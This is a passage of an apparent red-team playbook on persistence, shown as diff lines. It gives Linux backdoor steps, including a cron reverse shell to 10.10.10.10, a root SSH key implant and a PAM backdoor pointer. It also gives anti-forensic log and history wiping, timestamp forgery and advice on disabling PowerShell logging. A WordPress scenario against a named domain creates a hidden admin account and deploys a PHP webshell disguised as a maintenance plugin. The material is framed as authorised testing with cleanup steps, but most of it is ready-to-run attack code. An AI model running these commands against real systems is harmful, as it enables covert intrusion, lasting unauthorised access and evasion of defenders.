|
+
systemctl enable networkd-dispatcher.service
|
|
832
|
+
systemctl start networkd-dispatcher.service
|
|
833
|
+
|
|
834
|
+
PHASE 3: Layer 2 — Cron (backup trigger)
|
|
835
|
+
-------------------------------------------------------
|
|
836
|
+
# System-wide cron — different C2 port as backup
|
|
837
|
+
echo "*/15 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4445 0>&1' 2>/dev/null" \
|
|
838
|
+
>> /etc/crontab
|
|
839
|
+
|
|
840
|
+
PHASE 4: Layer 3 — SSH authorized_keys on root
|
|
841
|
+
-------------------------------------------------------
|
|
842
|
+
mkdir -p /root/.ssh
|
|
843
|
+
echo "ssh-ed25519 AAAA...KEY... system@maintenance" >> /root/.ssh/authorized_keys
|
|
844
|
+
chmod 600 /root/.ssh/authorized_keys
|
|
845
|
+
|
|
846
|
+
PHASE 5: Layer 4 — PAM backdoor (Expert)
|
|
847
|
+
-------------------------------------------------------
|
|
848
|
+
# Modify PAM to accept a hardcoded password for any user
|
|
849
|
+
# CAREFUL: This can break authentication entirely if misconfigured
|
|
850
|
+
# Use only on non-critical test systems or with explicit ROE approval
|
|
851
|
+
# Reference: https://github.com/zephrfish/pambd
|
|
852
|
+
|
|
853
|
+
PHASE 6: Verify
|
|
854
|
+
-------------------------------------------------------
|
|
855
|
+
ssh -i /tmp/backdoor_key root@target_ip "id"
|
|
856
|
+
# Trigger cron manually: run payload and catch shell
|
|
857
|
+
# Check service: systemctl status networkd-dispatcher
|
|
858
|
+
|
|
859
|
+
PHASE 7: Anti-forensics (OPSEC)
|
|
860
|
+
-------------------------------------------------------
|
|
861
|
+
# Clear bash history
|
|
862
|
+
history -c && history -w
|
|
863
|
+
echo "" > ~/.bash_history
|
|
864
|
+
|
|
865
|
+
# Clear systemd journal entries (if logs are local)
|
|
866
|
+
journalctl --rotate && journalctl --vacuum-time=1s
|
|
867
|
+
|
|
868
|
+
# Modify timestamps on artefact files
|
|
869
|
+
touch -r /usr/bin/ls /usr/local/sbin/networkd-dispatcher
|
|
870
|
+
```
|
|
871
|
+
|
|
872
|
+
---
|
|
873
|
+
|
|
874
|
+
### Scenario C — WordPress Admin to Persistent Web Access (Almentor Pattern)
|
|
875
|
+
|
|
876
|
+
**Context:** Obtained WordPress admin credentials via credential stuffing against Almentor's admin panel. Need persistent access that survives a password reset.
|
|
877
|
+
|
|
878
|
+
```
|
|
879
|
+
PHASE 1: Validate admin access
|
|
880
|
+
-------------------------------------------------------
|
|
881
|
+
curl -s -c /tmp/wp_cookies.txt \
|
|
882
|
+
-d "log=admin&pwd=FoundPassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
|
|
883
|
+
https://target.almentor.net/wp-login.php
|
|
884
|
+
|
|
885
|
+
# Check redirect — if wp-admin loaded, we're in
|
|
886
|
+
|
|
887
|
+
PHASE 2: Create Application Password (survives main password reset)
|
|
888
|
+
-------------------------------------------------------
|
|
889
|
+
# Via WP REST API (authenticated)
|
|
890
|
+
curl -s -X POST \
|
|
891
|
+
-u "admin:FoundPassword" \
|
|
892
|
+
https://target.almentor.net/wp-json/wp/v2/users/1/application-passwords \
|
|
893
|
+
-H "Content-Type: application/json" \
|
|
894
|
+
-d '{"name":"System Maintenance API"}'
|
|
895
|
+
# Save the returned password — shown ONCE
|
|
896
|
+
|
|
897
|
+
PHASE 3: Create backdoor administrator account
|
|
898
|
+
-------------------------------------------------------
|
|
899
|
+
curl -s -X POST \
|
|
900
|
+
-u "admin:APP_PASSWORD_FROM_STEP2" \
|
|
901
|
+
https://target.almentor.net/wp-json/wp/v2/users \
|
|
902
|
+
-H "Content-Type: application/json" \
|
|
903
|
+
-d '{
|
|
904
|
+
"username": "svc.monitor",
|
|
905
|
+
"password": "M0nitor$2024!",
|
|
906
|
+
"email": "svc.monitor@corp-internal.net",
|
|
907
|
+
"roles": ["administrator"],
|
|
908
|
+
"name": "Service Monitor"
|
|
909
|
+
}'
|
|
910
|
+
|
|
911
|
+
PHASE 4: Deploy PHP webshell via plugin upload
|
|
912
|
+
-------------------------------------------------------
|
|
913
|
+
# Create malicious plugin ZIP on Kali
|
|
914
|
+
mkdir -p /tmp/wp-plugin/system-maintenance
|
|
915
|
+
cat > /tmp/wp-plugin/system-maintenance/system-maintenance.php << 'EOF'
|
|
916
|
+
<?php
|
|
917
|
+
/*
|
|
918
|
+
Plugin Name: System Maintenance
|
|
919
|
+
Description: Internal system maintenance module
|
|
920
|
+
Version: 1.0
|
|
921
|
+
*/
|
|
922
|
+
if(isset($_GET['_token']) && $_GET['_token'] === 'abc123secret') {
|
|
923
|
+
system($_GET['cmd']);
|
|
924
|
+
}
|
|
925
|
+
EOF
|
|
926
|
+
cd /tmp/wp-plugin && zip -r /tmp/system-maintenance.zip system-maintenance/
|
|
927
|
+
|
|
928
|
+
# Upload via REST API (plugin install requires special capability — use WP admin UI or wp-cli)
|
|
929
|
+
# Via wp-cli on server:
|
|
930
|
+
wp --path=/var/www/html plugin install /tmp/system-maintenance.zip --activate
|
|
931
|
+
|
|
932
|
+
# Webshell access:
|
|
933
|
+
curl "https://target.almentor.net/wp-content/plugins/system-maintenance/system-maintenance.php?_token=abc123secret&cmd=id"
|
|
934
|
+
|
|
935
|
+
PHASE 5: Verify all channels
|
|
936
|
+
-------------------------------------------------------
|
|
937
|
+
# Test application password:
|
|
938
|
+
curl -s -u "admin:APP_PASSWORD" https://target.almentor.net/wp-json/wp/v2/users/me
|
|
939
|
+
# Test backdoor admin:
|
|
940
|
+
curl -s -u "svc.monitor:M0nitor$2024!" https://target.almentor.net/wp-json/wp/v2/users/me
|
|
941
|
+
# Test webshell:
|
|
942
|
+
curl "https://target.almentor.net/.../system-maintenance.php?_token=abc123secret&cmd=whoami"
|
|
943
|
+
|
|
944
|
+
PHASE 6: Cleanup (on engagement end)
|
|
945
|
+
-------------------------------------------------------
|
|
946
|
+
wp --path=/var/www/html plugin deactivate system-maintenance
|
|
947
|
+
wp --path=/var/www/html plugin delete system-maintenance
|
|
948
|
+
wp --path=/var/www/html user delete svc.monitor --yes
|
|
949
|
+
wp --path=/var/www/html user application-password delete admin --slug="system-maintenance-api"
|
|
950
|
+
```
|
|
951
|
+
|
|
952
|
+
---
|
|
953
|
+
|
|
954
|
+
## 7. OPSEC Considerations
|
|
955
|
+
|
|
956
|
+
### 7.1 Detection Risks by Technique
|
|
957
|
+
|
|
958
|
+
| Technique | Detection Method | Risk Level |
|
|
959
|
+
|---|---|---|
|
|
960
|
+
| HKCU Registry Run | Autoruns, EDR registry monitoring | MEDIUM |
|
|
961
|
+
| HKLM Registry Run | EDR, Sysmon Event ID 13 | HIGH |
|
|
962
|
+
| Startup Folder | File creation monitoring, EDR | HIGH |
|
|
963
|
+
| Schtasks | Sysmon Event ID 11, 4698 (Task Scheduled) | HIGH |
|
|
964
|
+
| Windows Service | Event 7045 (Service Installed) | HIGH |
|
|
965
|
+
| WMI Subscription | Sysmon Event ID 19/20/21, WMI-Activity log | MEDIUM-HIGH |
|
|
966
|
+
| DLL Hijacking | EDR module load monitoring, PE analysis | MEDIUM |
|
|
967
|
+
| COM Hijacking | EDR COM monitoring, HKCU COM writes | LOW-MEDIUM |
|
|
968
|
+
| User Cron | Auditd, inotify watchers | LOW |
|
|
969
|
+
| ~/.bashrc | Auditd file write events | LOW |
|
|
970
|
+
| authorized_keys | Auditd, SSH log correlation | MEDIUM |
|
|
971
|
+
| systemd service | Systemd journal, auditd | MEDIUM |
|
|
972
|
+
| LD_PRELOAD | /etc/ld.so.preload monitoring, auditd | LOW-MEDIUM |
|
|
973
|
+
| WP App Password | WordPress audit logs, login monitoring | LOW |
|
|
974
|
+
|
|
975
|
+
### 7.2 Evasion Principles
|
|
976
|
+
|
|
977
|
+
**Blend in with legitimate software names:**
|
|
978
|
+
- Use names from `tasklist` output or `sc query` that already exist
|
|
979
|
+
- Avoid generic names like "backdoor", "shell", "hack"
|
|
980
|
+
- Match capitalization and naming conventions of existing tasks/services
|
|
981
|
+
|
|
982
|
+
**Timestamp manipulation:**
|
|
983
|
+
```bash
|
|
984
|
+
# Match timestamps of dropped files to existing system files
|
|
985
|
+
touch -r /usr/bin/ls /path/to/payload
|
|
986
|
+
touch -r C:\Windows\System32\svchost.exe C:\Windows\Temp\payload.exe # PowerShell equivalent
|
|
987
|
+
```
|
|
988
|
+
|
|
989
|
+
**Avoid common IOC patterns:**
|
|
990
|
+
- Do not use `cmd.exe` as parent of PowerShell in scheduled tasks
|
|
991
|
+
- Prefer `lolbas` (Living Off the Land Binaries) over dropped EXEs
|
|
992
|
+
- Use HTTPS C2 on port 443 — blends with web traffic
|
|
993
|
+
- Avoid `IEX` without encoding — commonly flagged
|
|
994
|
+
|
|
995
|
+
**Limit execution frequency:**
|
|
996
|
+
- Cron every 5 minutes creates 288 events/day — noisy
|
|
997
|
+
- Prefer event-triggered persistence (logon, startup) over scheduled polling
|
|
998
|
+
|
|
999
|
+
**Disable Windows Script Block Logging in PowerShell (if admin):**
|
|
1000
|
+
```powershell
|
|
1001
|
+
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 0
|
|
1002
|
+
```
|
|
1003
|
+
|
|
1004
|
+
### 7.3 Cleanup Protocol
|
|
1005
|
+
|
|
1006
|
+
**Always clean up in this order:**
|
|
1007
|
+
1. Stop the persistence mechanism (stop service, disable task)
|
|
1008
|
+
2. Remove the trigger (delete registry key, cron entry, service)
|
|
1009
|
+
3. Remove the payload file
|
|
1010
|
+
4. Clear relevant logs
|
|
1011
|
+
5. Verify removal
|
|
1012
|
+
6. Document cleanup in engagement log
|
|
1013
|
+
|
|
1014
|
+
**Windows cleanup verification:**
|
|
1015
|
+
```powershell
|
|
1016
|
+
# Check common persistence locations
|
|
1017
|
+
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
1018
|
+
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
1019
|
+
Get-ScheduledTask | Where-Object State -ne Disabled | Select-Object TaskName,TaskPath
|
|
1020
|
+
Get-Service | Where-Object StartType -eq Automatic | Select-Object Name,DisplayName
|
|
1021
|
+
Get-WMIObject -Namespace root\subscription -Class __EventFilter
|
|
1022
|
+
```
|
|
1023
|
+
|
|
1024
|
+
**Linux cleanup verification:**
|
|
1025
|
+
```bash
|
|
1026
|
+
crontab -l
|
|
1027
|
+
cat /etc/crontab
|
|
1028
|
+
ls /etc/cron.d/
|
|
1029
|
+
systemctl list-unit-files --state=enabled
|
|
1030
|
+
cat /etc/ld.so.preload
|
|
1031
|
+
cat ~/.ssh/authorized_keys
|
|
1032
|
+
grep -n "suspicious_content" ~/.bashrc ~/.profile ~/.bash_profile
|
|
1033
|
+
```
|
|
1034
|
+
|
|
1035
|
+
---
|
|
1036
|
+
|
|
1037
|
+
## 8. Output and Documentation Instructions
|
|
1038
|
+
|
|
1039
|
+
### 8.1 What to Capture
|
|
1040
|
+
|
|
1041
|
+
For every persistence mechanism deployed, document:
|
|
1042
|
+
|
|
1043
|
+
```
|
|
1044
|
+
[PERSISTENCE LOG ENTRY]
|
|
1045
|
+
Date/Time (UTC):
|
|
1046
|
+
Target Host:
|
|
1047
|
+
Target OS:
|
|
1048
|
+
Operator:
|
|
1049
|
+
Technique Used:
|
|
1050
|
+
Privilege Level:
|
|
1051
|
+
Artefact Path(s):
|
|
1052
|
+
- Payload: <path> | SHA256: <hash>
|
|
1053
|
+
- Config entry: <key/file/service name>
|
|
1054
|
+
Trigger:
|
|
1055
|
+
C2 Channel: <IP>:<PORT> (protocol)
|
|
1056
|
+
Verification: [PASS/FAIL] — method used
|
|
1057
|
+
OPSEC notes:
|
|
1058
|
+
Cleanup status: [PENDING/COMPLETE]
|
|
1059
|
+
Cleanup steps taken:
|
|
1060
|
+
```
|
|
1061
|
+
|
|
1062
|
+
### 8.2 Screenshot Checklist
|
|
1063
|
+
|
|
1064
|
+
- [ ] `whoami` / `id` before persistence deployment
|
|
1065
|
+
- [ ] Command output of deployment step
|
|
1066
|
+
- [ ] Verification command output (task list, reg query, service status)
|
|
1067
|
+
- [ ] Callback received in listener (timestamp visible)
|
|
1068
|
+
- [ ] Cleanup confirmation commands and output
|
|
1069
|
+
|
|
1070
|
+
### 8.3 Artefact Hashing
|
|
1071
|
+
|
|
1072
|
+
```bash
|
|
1073
|
+
# On Kali — hash payload before transfer
|
|
1074
|
+
sha256sum /tmp/payload.exe
|
|
1075
|
+
|
|
1076
|
+
# On Windows target
|
|
1077
|
+
Get-FileHash "C:\Windows\Temp\payload.exe" -Algorithm SHA256
|
|
1078
|
+
|
|
1079
|
+
# On Linux target
|
|
1080
|
+
sha256sum /usr/local/bin/.sysupdate
|
|
1081
|
+
```
|
|
1082
|
+
|
|
1083
|
+
### 8.4 Engagement Log Format
|
|
1084
|
+
|
|
1085
|
+
```markdown
|
|
1086
|
+
## Persistence — [Target] — [Date]
|
|
1087
|
+
|
|
1088
|
+
### Deployed Mechanisms
|
|
1089
|
+
| ID | Host | Technique | Artefact | C2 | Status |
|
|
1090
|
+
|----|------|-----------|----------|----|--------|
|
|
1091
|
+
| P1 | DC01 | Schtasks SYSTEM | \Microsoft\Windows\WinDefend\ScanTask | 10.10.10.10:443 | ACTIVE |
|
|
1092
|
+
| P2 | WEB01 | WP App Password | admin/System Maintenance API | N/A | ACTIVE |
|
|
1093
|
+
|
|
1094
|
+
### Cleanup Log
|
|
1095
|
+
| ID | Cleaned By | Time | Method |
|
|
1096
|
+
|----|-----------|------|--------|
|
|
1097
|
+
| P1 | operator | 2026-05-31 18:00 UTC | schtasks /delete |
|
|
1098
|
+
| P2 | operator | 2026-05-31 18:05 UTC | wp user application-password delete |
|
|
1099
|
+
```
|
|
1100
|
+
|
|
1101
|
+
---
|
|
1102
|
+
|
|
1103
|
+
## 9. Resources
|
|
1104
|
+
|
|
1105
|
+
### Official Documentation
|
|
1106
|
+
- MITRE ATT&CK — Persistence Tactic: https://attack.mitre.org/tactics/TA0003/
|
|
1107
|
+
- MITRE ATT&CK — Boot or Logon Autostart Execution: https://attack.mitre.org/techniques/T1547/
|
|
1108
|
+
- MITRE ATT&CK — Scheduled Task/Job: https://attack.mitre.org/techniques/T1053/
|
|
1109
|
+
- MITRE ATT&CK — WMI Event Subscription: https://attack.mitre.org/techniques/T1546/003/
|
|
1110
|
+
|
|
1111
|
+
### Tools and Frameworks
|
|
1112
|
+
- SharPersist (Mandiant): https://github.com/mandiant/SharPersist
|
|
1113
|
+
- SharpWMI (GhostPack): https://github.com/GhostPack/SharpWMI
|
|
1114
|
+
- PowerSploit (PowerShellMafia): https://github.com/PowerShellMafia/PowerSploit
|
|
1115
|
+
- Impacket (Fortra): https://github.com/fortra/impacket
|
|
1116
|
+
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
|
|
1117
|
+
- Evil-WinRM: https://github.com/Hackplayers/evil-winrm
|
|
1118
|
+
- COMHijackToolkit: https://github.com/dr4k0nia/COMHijackToolkit
|
|
1119
|
+
- Chisel (tunneling): https://github.com/jpillora/chisel
|
|
1120
|
+
|
|
1121
|
+
### WMI Persistence Deep Dives
|
|
1122
|
+
- FireEye WMI Persistence: https://github.com/mandiant/wmi-monitor
|
|
1123
|
+
- WMI for script kiddies (Matt Graeber): https://github.com/mattifestation/WMIBackdoor
|
|
1124
|
+
|
|
1125
|
+
### DLL / COM Hijacking
|
|
1126
|
+
- Windows DLL Hijacking (Wietze Beukema): https://github.com/wietze/windows-dll-hijacking
|
|
1127
|
+
- LOLBAS Project: https://github.com/LOLBAS-Project/LOLBAS
|
|
1128
|
+
- LOOBins (macOS/Linux LOLB): https://github.com/infosecB/LOOBins
|
|
1129
|
+
|
|
1130
|
+
### Linux Persistence
|
|
1131
|
+
- Persistence The Unix Way (SANS): https://www.sans.org/reading-room/whitepapers/linux/paper/39450
|
|
1132
|
+
- Diamorphine LKM Rootkit: https://github.com/m0nad/Diamorphine
|
|
1133
|
+
- PAM Backdoor reference: https://github.com/zephrfish/pambd
|
|
1134
|
+
|
|
1135
|
+
### WordPress Security
|
|
1136
|
+
- WP Application Passwords: https://make.wordpress.org/core/2020/11/05/application-passwords-integration-guide/
|
|
1137
|
+
- WPScan: https://github.com/wpscanteam/wpscan
|
|
1138
|
+
|
|
1139
|
+
### Detection and Hunting (Know Your Adversary)
|
|
1140
|
+
- Sysmon Config (SwiftOnSecurity): https://github.com/SwiftOnSecurity/sysmon-config
|
|
1141
|
+
- Sigma Rules — Persistence: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set
|
|
1142
|
+
- Awesome WMI (detection): https://github.com/davidpany/WMI_Forensics
|
|
1143
|
+
|
|
1144
|
+
---
|
|
1145
|
+
|
|
1146
|
+
*Skill maintained by RTExit Red Team. Update engagement-specific sections after each engagement post-mortem.*
|